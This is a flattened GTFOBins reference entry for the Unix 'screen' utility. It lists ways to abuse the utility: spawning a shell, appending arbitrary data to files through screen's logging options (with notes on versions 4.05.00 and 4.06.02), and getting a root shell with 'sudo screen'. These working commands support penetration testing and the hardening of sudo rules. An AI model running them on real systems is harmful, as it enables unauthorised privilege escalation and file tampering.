GTFOBins.github.io/_gtfobins/screen.md

494 B

functions
shell file-write sudo
code
screen
description code
This works on screen version 4.06.02. Data is appended to the file and `\n` is converted to `\r\n`. LFILE=file_to_write screen -L -Logfile $LFILE echo DATA
description code
This works on screen version 4.05.00. Data is appended to the file and `\n` is converted to `\r\n`. LFILE=file_to_write screen -L $LFILE echo DATA
code
sudo screen